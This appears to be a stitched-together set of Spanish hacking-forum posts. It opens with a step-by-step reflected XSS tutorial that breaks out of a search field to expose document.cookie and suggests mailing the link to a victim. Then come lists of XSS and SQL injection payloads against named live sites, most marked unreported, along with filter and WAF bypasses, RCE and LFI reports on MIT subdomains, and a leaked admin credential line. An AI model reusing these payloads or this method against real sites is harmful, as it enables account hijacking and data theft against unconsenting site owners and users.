Bueno Antes que Nada este es solo un modelo de las posibilidades que brinda esta vulnerabilidad
recomiendo utilizar Firefox ya que Chrome tiene un bloqueo de Pop-up que nos va a impedir explotar comodamente el fallo

A tener en Cuenta:


Existe 2 tipos de XSS (Cross Site Scripting) ambos se basan en la ejecucion de codigo JavaScript sin que el ClientSide este pendiente de que esto va a suceder.

Reflected:


Son Aquellos producidos por un reflejo del Vector ingresado en el codigo html, por ej: Impresion de la Busqueda en una Web

Stored:


Son Aquellos Cuyo Vector ingresado queda registrado y/o impreso directamente en el contenido html de la Web Afectada.

Un Ej de esto seria un comentario de Moderacion que se guarda en una base de datos de gestion web por un Panel de Administracion, para darle el visto bueno.

Al Ingresar por ej un Script del tipo <script>alert("XSS")</script> no lo veriamos ejecutarce porq este esta pendiente de moderacion,
el Administrador al Ingresar al Panel de Moderacion este comentario se ejecutaria al momento de Moderar el Comentario. (Situacion Ideal)

Esto se puede utilizar para robar Cookies para luego lograr logearnos como ese Usuario.

Desarrollo:


En Fin Ambos Ataques se diferencian unicamente en el alcanse que poseen, XSS Reflected requiere un poco de ingenieria social para lograr nuestro Objetico

Hoy Vamos a Tomar como ejempo a No tienes permitido ver los links. Registrarse o Entrar a mi cuenta que posee un fallo de XSS Reflected que reportado numerosas veces sin tener respuestas ni ver Correccion del Bug.

Comencemos:


Abrimos en Nuestro Navegador No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y vemos un flamante campo de Busqueda, interesado en ver que sucede ingreso un Vector de Busqueda.

Vector de Busqueda: >AQUI<

Inspeccionamos Elementos con Chrome y buscamos dentro del Codigo html la palabra AQUI




Vemos que no produce ningun tipo de Evacion ni Filtrado ante los caracteres ">" ni "<" esto da pie a pensar que vulnerable sin siquiera tener
que evadir con Double Encode.

Analicemos:

<input type="text" name="textoBusqueda" class="texto" value=">AQUI<">

lo que intentaremos lograr es sacar nuestro Vector de Ataque fuera del input, como podemos ver la propiedad Value abre y cierra con doble comilla
intentaremos cerrar value, luego cerrar el input, injectar el vector y comentar el resto del codigo html

Escapando de la propiedad Value:


Para lograr esto en nuestro vector inyectaremos unas comillas dobles (")

esto quedara de la siguiente manera:

<input type="text" name="textoBusqueda" class="texto" value=""">

como podemos ver queda por demas al final de la etiqueta un " antes del cierre >

Escapando del Input:


Ahora escaparemos del input, la logica de lo que vemos dice q se cierra con un ">" pero con un conocimiento minimo de html sabremos que las etiquetas input se cierran con /> aunque el inspector de Elementos de Chrome diga lo contrario.

Inyectaremos como Vector "/>

y nos quedara de la siguiente manera:

<input type="text" name="textoBusqueda" class="texto" value=""/>">

Como vemos queda de mas al final de nuestro input "> esto producira un error de sintaxis por lo que deseamos eliminar esto ultimo
y lo vamos a lograr comentando el resto del codigo html

Por lo que agregaremos un <!-- al final de nuestro vector:

"/><!--

y quedara una ves ejecutado:

<input type="text" name="textoBusqueda" class="texto" value=""/><!--">

dejando sin utilidad todo lo posterior a nuestra apertura de Comentario.

Si probamos este codigo veremos que no se ejecuta nada pero la busqueda se realiza con exito.







Al ver el contenido con el Inspector de Elementos, vemos que value aparece sin ningun valor y que el resto del codigo esta comentado:

<input type="text" name="textoBusqueda" class="texto" value="">

y esto es lo que estamos buscando, terminaremos la inyeccion agregando a nuestro vector justo antes de comentar (<!--) el codigo JavaScript que deseamos ejecutar

quedando de la siguiente manera:

Vector:

"/><script>alert(document.cookie)</script><!--

Reflejo Web:

<input type="text" name="textoBusqueda" class="texto" value="""/><script>alert(document.cookie)</script><!--">

esto producira que el codigo JavaScript se ejecute:

Si leyeron el Comienzo de este Tutorial veran que recomiendo usar Firefox para completar la explotacion ya que Chrome previene de ventanas Emergentes.





Vemos que se Ejecuta con Exito y deja Expuesto la cookie del Usuario.

Ingenieria Social:


Podriamos agregar en nuestro script una redireccion a un archivo php que almacenara esta cookie, y lo vamos a lograr con un poco de Ingenieria Social para explotar este Reflected XSS. Solo que en nuestro caso no robaremos la cookie solo Mostraremos un Alert a La Victima ya que estamos sobre un rubro etico.

Como vemos nuestro Vector de Ataque se produce por GET por lo que veremos nuestra inyeccion en la URL de nuestro Navegador:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta




Dandonos como resultado este Link:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Solo resta Enviar a Nuestra Victima este Link con algun discurso para que lo Abra en su Navegador.





Al revisar nuestra bandeja de entrada, vemos como el link cayo como Seguro y sin pasar al buzon de Spam




Al Hacer Click en el link Sucede la Magia:





Evasion de Filtros en XSS


Existe Distintos metodos de evacion utlizando metodos propios de javascript dentro de las etiquetas html que queremos inyectar, por Ej

<b onLoad=alert(/XSS/)></b>
<img src=. onerror=alert(/XSS/)>

Utilizar un Doble Encode Codificando 2 veces el Vector con URL Encode antes de ingresarlo

<b onLoad=alert(/XSS/)></b> A Double Encode:

%253Cb%2520onLoad%253Dalert%2528%252fXSS%252f%2529%253E%253C%252fb%253E

Double Tag para saltar StripTags

<scr<script>ipt>alert(/XSS/)</scr<script>ipt><!--

StripTag eliminara la etiqueta <script> y unira la etiqueta divididada.

Estos son unos de Muchos Otros Metodos de Evasion.

Xss Reflected:
Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vector: <script>alert("HD_Breaker")</script>
Reportado: No

PD: un fallo algo raro, que esta dado ya que se muestra escrito en web la sentencia el Usuario "XSS" No existe, de esta forma se puede explotar este tipo de XSS

SQLI
Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vector: Usuario:  ' or 1=1-- /// Password: ' or 1=1--
Reportado: No

SQLI

Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vector: Le Pase sqlmap porq es BlindSql y no tenia ganas de probar No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Reportado: No

XSS

Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vector: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta"><img src=. onerror=alert("HD_Breaker")><!--
Reportado: No

XSS

Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vector: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta><script>alert(/HD_Breaker/)</script>
Reportado: No

XSS

Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vector: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Reportado: No

XSS

Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vector: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Reportado: No

Recuerdo que alguien ya habia reportado un xss en CuantoCabron, pero creo q no es el mismo y q el otro estaba reparado, este es con double encode y caracteres limitados.

Pido Disculpas si Otra persona lo descubrio previamente

Como ven Dice Iniciar Sesion

Luego Del Vector:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Le Damos en Continuar



Vemos como ya estamos dentro como un usuario Fantasma

Le Damos a Editar:



y Podemos Cambiar los Datos de Nuestro User:



Reportado: No

XSS

Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vector: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta<%2Fi><img+src%3D.+onerror%3Dalert(/HD_Breaker/)><!--
Reportado: No

SQLI Double Error Based:

Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vector: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Reportado: No

XSS Double Encode

Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vector: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Reportado: No

SQLI

Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vector: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Reportado: No

XSS

Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vector: "><script>alert(/HD_Breaker/)</script><!--
Reportado: No

Seguro se suman como afiliados son gente muy copada

XSS

Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vector: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Reportado: NO
Autor: HD_Breaker

SQLI:

Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vector: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vector2: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Reportado: NO

SQLI SQLI Error Based:

Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vector: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vector2: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Reportado: NO

XSS
Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vector: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta<script>alert(/HD_Breaker/)</script>&clase=c
Reportado: NO

SQLI:
WEB: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vector: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Reportado: NO

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta and <script>alert(/HD_Breaker/)</script>
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta<script>alert(/HD_Breaker/)</script>
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta and <script>alert(/HD_Breaker/)</script>
Reportado: No

Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vector: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta (Salta el error tiene 4)
Tiene WAF

Despues de no poder rendirme ante el WAF (Cuestion de Honor) y peliando un rato con el lo bypassie.



Vector=No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
user(): Error: Duplicate entry '[email protected]~1' for key 1
database: Error: Duplicate entry 'gente~1' for key 1

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta<%2Fdiv><script>alert("HD_Breaker - URS")<%2Fscript><!--

Buscando un sqli encontre otro xss:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

XSS:

Url del sitio: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vector: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta<img src=. onerror=alert("HD_Breaker")>
Autor: HD_Breaker
Reportado: No (Me fui a Dormir)

Bueno hoy voy a Mostrarles un Fallo de Seguridad en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, donde se puede mantener una session creada al momento de registrarse para loguearse al servicio con una cuenta inexistente sin validar el usuario via email.

Primero vamos a:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

registramos un usuario con información sin importancia, en mi caso

Nombre: HD_Breaker
   Email: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
   Clave: 1234



Damos Click en Registrar y si somos detallistas podemos ver en la esquina superior izquierda un boton que nos dice Abort session ()



Sin Salir de la pagina clickeamos 1 vez hacia atrás, y ganamos acceso por medio de la sesión que se crea al registrarnos



Como Podemos ver en esta imagen sin estar Logeados, podemos acceder al servicio y subir archivos



podemos ver como se pueden generar los link de distribución.



Esto Mismo se Puede Generar con un Administrador de Sesiones, robando la sesión y luego utilizar la misma para Loguearse Temporalmente.

El Fallo se trata de un mal control del tiempo y directorio de la Session creada al Registrarnos.

Url del sitio: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Autor: HD_Breaker
Reportado: SI

Otro fallo de seguridad en otro subdominio del MIT que nos permite ejecutar codigo Arbitrario y Crear Archivos php.





Remote Execution:

Url del sitio: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vector: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Autor: HD_Breaker
Reportado: SI

Le Sigo dando al MIT:



AFD o FSD (Como lo Conoscan):

Url del sitio: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vector: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Autor: HD_Breaker
Reportado: SI

XSS

Url del sitio: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vector: "</i><h1>HD_Breaker for Underc0de</h1><!--
Autor: HD_Breaker
Reportado: SI

LFI

Url del sitio: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vector: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Autor: HD_Breaker
Reportado: SI

XSS:

Url del sitio: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vector: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Autor: HD_Breaker
Reportado: NO

La Atencion al cliente es Telefonica, y no tengo ganas de llamar para que me tengan a la espera 3 hs, si Underc0de lo desea puede reportarlo.

XSS

Url del sitio: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vector: </h6><img src=. onerror=alert(/HD_BreaKer/)><!--
Autor: HD_Breaker
Reportado: SI

En Memoria a Aaron Schwartz RIP...





XSS:

Url del sitio: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vector: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Autor: HD_Breaker
Reportado: SI

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

admin:28dic2007:Dpto. Informática - Administrador

Saludos!

Bueno les traigo un pequeño reto de Programacion a mi me gusto mucho esta idea:

/*Teniendo un arreglo de 10 elementos tipo String construya un programa que
         * permita el ingreso de palargas en cada casillero
         * a)Muestre un listado de las palabras ingresadas pero habiendo convertido a mayusculas:
         * la letra del medio de aquellas palabras cuyo numero de letras es impar
         * b)la ultima letra de aquellas palabras cuyo numero de letras es par
         * para lograr lo anterior se creara una funcion con siguientes caracteristicas,
         * i)nombre: a_mays
         * ii)argumento:el elemento del arreglo
         * iii)tipo de devolucion string q contendra la palabra con su letra correspondiente convertidas a mayusculas
         * iiii)el programa principal recivira el resuntaldo de la funcion reemplazando
         * el valor existente del arreglo y luego mostrando como quedo el arreglo modificado
         */
Completado Por: HckDrk


My Code en Java:

import javax.swing.JOptionPane;

public class EjercicioProg1 {

    public static void main(String[] args) {
        
        String Palabras[] = new String[10];
        for (int i = 0; i < Palabras.length; i++) {
            Palabras[i]=JOptionPane.showInputDialog("Ingrese una Palabra");            
            Palabras[i]=a_mays(Palabras[i]);
        }
        for (int i = 0; i < 10; i++) {
        System.out.println(""+Palabras[i]);
            
        }
        
    }
    
    public static String a_mays(String Entrada){
    String Salida="";
    int EnteroLMayus=0;
    char MayusPar[]=new char[Entrada.length()];
    char MayusIm[]=new char[Entrada.length()];
        for (int i = 0; i < Entrada.length(); i++) {
            MayusPar[i]=Entrada.charAt(i);
            MayusIm[i]=Entrada.charAt(i);
            
        }
        
        
            if ((MayusPar.length%2)==0) {                
                MayusPar[MayusPar.length-1]=(char)(((int)(MayusPar[MayusPar.length-1]))-32);
                Salida=Salida.valueOf(MayusPar);
            }else{
                
                    MayusIm[(Entrada.length()/2)]=(char)((int)(MayusIm[(Entrada.length()/2)])-32);
                    Salida=Salida.valueOf(MayusIm);
                        
            }
           
    return Salida;
                
                }  
        }

Bueno Me hice un tiempo lejos de la Facultad y se me dio por Programar este Pequeño Reto.
Se Trata de Generar un Exploit Propio para mi Aplicaccion.

Que es un Exploit?

Exploit (del inglés to exploit, explotar o aprovechar) es crear una pieza de software, o una secuencia de comandos con el fin de causar un error o un fallo en alguna aplicación, a fin de causar un comportamiento no deseado o imprevisto en este y lograr ejecutar codigo Arbitrario. Lo Cual el Programa Original no Estaba Destinado a Lograr.

Aca el Link de la Aplicacion: (Actualizado)

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Un Pantallazo para que vean q es vulnerable:



Reglas:
1- Postear un Pantallazo de una Aplicacion q se ejecuta con el Exploit Tapando el Codigo Mostrado en Consola.
2- Mandarme por MP el Script con el q desarrollaron el Exploit para corroborar q realmente explotaron el fallo y no se bajaron algun code de Internet.
3- No den Pistas, y por favor no Publiquen la Solucion hasta q de por Concluido el Reto.


Se tomara en Cuenta a los 5 Primeros q Resuelvan el Reto:


1°  Snakingmax
2°  Erroneo0 Excelente aplicación de Ret2Libc en win!
3°
4°
5°

Ya que estamos a full con los XSS aporto mi granito de arena.